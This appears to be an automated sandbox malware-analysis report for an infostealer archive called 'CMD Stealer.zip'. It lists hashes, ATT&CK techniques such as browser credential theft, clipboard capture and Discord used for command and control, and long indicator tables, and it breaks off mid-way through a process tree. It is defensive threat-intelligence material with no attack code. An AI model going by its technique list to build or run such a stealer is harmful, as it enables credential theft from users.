ed63fc9481569770bd59d936ee466475235ffb02b57c7a49e75d49f28e81f4bb

Analysis

max time kernel
327s
max time network
310s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
23/11/2024, 22:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CMD Stealer.zip
Size

5.8MB
MD5

296a693438e779008a5fa2fc7ad5e9ce
SHA1

a583e13aefdac3185b4127bb4f85023b59765e7c
SHA256

ed63fc9481569770bd59d936ee466475235ffb02b57c7a49e75d49f28e81f4bb
SHA512

641cd05c01bc9bdd3f9ac0e48e7f784eb68298475e0fa6cf2f4c026bdff0c2a0403bd70430561c47a317492a0736e2cb0b0066e51d6b72c9a3387db372bb491a
SSDEEP

98304:9wl4udxPTR44/szfM+aHtnpeymmMv1LdA1TN9pNAbxfEeRy2snE+2+pPOHmcaG5g:9sPl44/ped5d6exfhg2sE+2+pmHmcaGy

Score

8^/10

collection defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5880	powershell.exe
1968	powershell.exe
4100	powershell.exe
4704	powershell.exe
2276	powershell.exe
5960	powershell.exe
1388	powershell.exe
2256	powershell.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5760	powershell.exe
1380	cmd.exe
1672	powershell.exe
4680	cmd.exe

Executes dropped EXE 6 IoCs

pid	Process
5332	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1112	rar.exe
3432	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
3128	rar.exe

Loads dropped DLL 33 IoCs

pid	Process
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
5460	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
1588	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
214	discord.com
215	discord.com
222	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
204	ip-api.com
218	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
4204	tasklist.exe
4732	tasklist.exe
4784	tasklist.exe
1444	tasklist.exe
4556	tasklist.exe
3372	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ae94-2295.dat	upx
behavioral1/memory/5460-2299-0x00007FFA90150000-0x00007FFA905BE000-memory.dmp	upx
behavioral1/files/0x001a00000002ae87-2314.dat	upx
behavioral1/memory/5460-2316-0x00007FFA9ED80000-0x00007FFA9ED8F000-memory.dmp	upx
behavioral1/memory/5460-2315-0x00007FFA985F0000-0x00007FFA98614000-memory.dmp	upx
behavioral1/files/0x001f00000002aa71-2313.dat	upx
behavioral1/files/0x001900000002ae99-2312.dat	upx
behavioral1/files/0x001900000002ae98-2311.dat	upx
behavioral1/files/0x001900000002ae97-2310.dat	upx
behavioral1/files/0x001900000002ae93-2307.dat	upx
behavioral1/files/0x001900000002ae91-2306.dat	upx
behavioral1/files/0x001900000002ae92-2304.dat	upx
behavioral1/files/0x001a00000002ae86-2302.dat	upx
behavioral1/memory/5460-2321-0x00007FFA984F0000-0x00007FFA9851D000-memory.dmp	upx
behavioral1/memory/5460-2322-0x00007FFA9AA40000-0x00007FFA9AA59000-memory.dmp	upx
behavioral1/memory/5460-2323-0x00007FFA95BA0000-0x00007FFA95BBF000-memory.dmp	upx
behavioral1/memory/5460-2324-0x00007FFA83F40000-0x00007FFA840B1000-memory.dmp	upx
behavioral1/memory/5460-2325-0x00007FFA95A90000-0x00007FFA95AA9000-memory.dmp	upx
behavioral1/memory/5460-2326-0x00007FFA985B0000-0x00007FFA985BD000-memory.dmp	upx
behavioral1/memory/5460-2327-0x00007FFA95A60000-0x00007FFA95A8E000-memory.dmp	upx
behavioral1/memory/5460-2329-0x00007FFA90E00000-0x00007FFA90EB8000-memory.dmp	upx
behavioral1/memory/5460-2332-0x00007FFA985F0000-0x00007FFA98614000-memory.dmp	upx
behavioral1/memory/5460-2331-0x00007FFA83BC0000-0x00007FFA83F35000-memory.dmp	upx
behavioral1/memory/5460-2328-0x00007FFA90150000-0x00007FFA905BE000-memory.dmp	upx
behavioral1/memory/5460-2333-0x00007FFA95A10000-0x00007FFA95A24000-memory.dmp	upx
behavioral1/memory/5460-2335-0x00007FFA984E0000-0x00007FFA984ED000-memory.dmp	upx
behavioral1/memory/5460-2334-0x00007FFA984F0000-0x00007FFA9851D000-memory.dmp	upx
behavioral1/memory/5460-2339-0x00007FFA83AA0000-0x00007FFA83BB8000-memory.dmp	upx
behavioral1/memory/5460-2338-0x00007FFA9AA40000-0x00007FFA9AA59000-memory.dmp	upx
behavioral1/memory/5460-2366-0x00007FFA95BA0000-0x00007FFA95BBF000-memory.dmp	upx
behavioral1/memory/5460-2415-0x00007FFA83F40000-0x00007FFA840B1000-memory.dmp	upx
behavioral1/memory/5460-2437-0x00007FFA95A90000-0x00007FFA95AA9000-memory.dmp	upx
behavioral1/memory/5460-2441-0x00007FFA95A60000-0x00007FFA95A8E000-memory.dmp	upx
behavioral1/memory/5460-2442-0x00007FFA90E00000-0x00007FFA90EB8000-memory.dmp	upx
behavioral1/memory/5460-2453-0x00007FFA83BC0000-0x00007FFA83F35000-memory.dmp	upx
behavioral1/memory/5460-2463-0x00007FFA95A10000-0x00007FFA95A24000-memory.dmp	upx
behavioral1/memory/5460-2489-0x00007FFA90E00000-0x00007FFA90EB8000-memory.dmp	upx
behavioral1/memory/5460-2488-0x00007FFA95A60000-0x00007FFA95A8E000-memory.dmp	upx
behavioral1/memory/5460-2487-0x00007FFA985B0000-0x00007FFA985BD000-memory.dmp	upx
behavioral1/memory/5460-2486-0x00007FFA95A90000-0x00007FFA95AA9000-memory.dmp	upx
behavioral1/memory/5460-2485-0x00007FFA83F40000-0x00007FFA840B1000-memory.dmp	upx
behavioral1/memory/5460-2484-0x00007FFA95BA0000-0x00007FFA95BBF000-memory.dmp	upx
behavioral1/memory/5460-2483-0x00007FFA9AA40000-0x00007FFA9AA59000-memory.dmp	upx
behavioral1/memory/5460-2482-0x00007FFA984F0000-0x00007FFA9851D000-memory.dmp	upx
behavioral1/memory/5460-2481-0x00007FFA9ED80000-0x00007FFA9ED8F000-memory.dmp	upx
behavioral1/memory/5460-2480-0x00007FFA985F0000-0x00007FFA98614000-memory.dmp	upx
behavioral1/memory/5460-2479-0x00007FFA83BC0000-0x00007FFA83F35000-memory.dmp	upx
behavioral1/memory/5460-2478-0x00007FFA83AA0000-0x00007FFA83BB8000-memory.dmp	upx
behavioral1/memory/5460-2477-0x00007FFA984E0000-0x00007FFA984ED000-memory.dmp	upx
behavioral1/memory/5460-2476-0x00007FFA95A10000-0x00007FFA95A24000-memory.dmp	upx
behavioral1/memory/5460-2464-0x00007FFA90150000-0x00007FFA905BE000-memory.dmp	upx
behavioral1/memory/1588-2511-0x00007FFA90130000-0x00007FFA9059E000-memory.dmp	upx
behavioral1/memory/1588-2513-0x00007FFA9ED80000-0x00007FFA9ED8F000-memory.dmp	upx
behavioral1/memory/1588-2512-0x00007FFA98770000-0x00007FFA98794000-memory.dmp	upx
behavioral1/memory/1588-2518-0x00007FFA985F0000-0x00007FFA9861D000-memory.dmp	upx
behavioral1/memory/1588-2519-0x00007FFA98500000-0x00007FFA9851F000-memory.dmp	upx
behavioral1/memory/1588-2520-0x00007FFA984E0000-0x00007FFA984F9000-memory.dmp	upx
behavioral1/memory/1588-2521-0x00007FFA98760000-0x00007FFA9876D000-memory.dmp	upx
behavioral1/memory/1588-2525-0x00007FFA83BC0000-0x00007FFA83F35000-memory.dmp	upx
behavioral1/memory/1588-2524-0x00007FFA94960000-0x00007FFA94A18000-memory.dmp	upx
behavioral1/memory/1588-2523-0x00007FFA95B90000-0x00007FFA95BBE000-memory.dmp	upx
behavioral1/memory/1588-2522-0x00007FFA90130000-0x00007FFA9059E000-memory.dmp	upx
behavioral1/memory/1588-2527-0x00007FFA95A90000-0x00007FFA95AA4000-memory.dmp	upx
behavioral1/memory/1588-2526-0x00007FFA98770000-0x00007FFA98794000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5796	WMIC.exe
1100	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4148	systeminfo.exe
4480	systeminfo.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
5220	taskkill.exe
5408	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768744124022335"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3973800497-2716210218-310192997-1000\{D77D55EA-D376-492B-9D4E-CA4755C3B5F9}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
2724	msedge.exe
2724	msedge.exe
3428	msedge.exe
3428	msedge.exe
3864	msedge.exe
3864	msedge.exe
1880	identity_helper.exe
1880	identity_helper.exe
804	chrome.exe
804	chrome.exe
5960	powershell.exe
5960	powershell.exe
4704	powershell.exe
2276	powershell.exe
2276	powershell.exe
4704	powershell.exe
1920	powershell.exe
1920	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1920	powershell.exe
5880	powershell.exe
5880	powershell.exe
2952	powershell.exe
2952	powershell.exe
2256	powershell.exe
1388	powershell.exe
1968	powershell.exe
1968	powershell.exe
1388	powershell.exe
2256	powershell.exe
2256	powershell.exe
5760	powershell.exe
5760	powershell.exe
4548	powershell.exe
4548	powershell.exe
5760	powershell.exe
4548	powershell.exe
4100	powershell.exe
4100	powershell.exe
4900	powershell.exe
4900	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

pid	Process
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2944	7zFM.exe
Token: 35	2944	7zFM.exe
Token: SeSecurityPrivilege	2944	7zFM.exe
Token: 33	6004	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	6004	AUDIODG.EXE
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe
Token: SeCreatePagefilePrivilege	804	chrome.exe
Token: SeShutdownPrivilege	804	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2944	7zFM.exe
2944	7zFM.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe
804	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe
5132	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3428 wrote to memory of 348	3428	msedge.exe	84
PID 3428 wrote to memory of 348	3428	msedge.exe	84
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2424	3428	msedge.exe	85
PID 3428 wrote to memory of 2724	3428	msedge.exe	86
PID 3428 wrote to memory of 2724	3428	msedge.exe	86
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87
PID 3428 wrote to memory of 3420	3428	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\CMD Stealer.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa94a03cb8,0x7ffa94a03cc8,0x7ffa94a03cd8
  2⤵
  PID:348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2
  2⤵
  PID:2424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,109808050592079467,9409402163082911734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
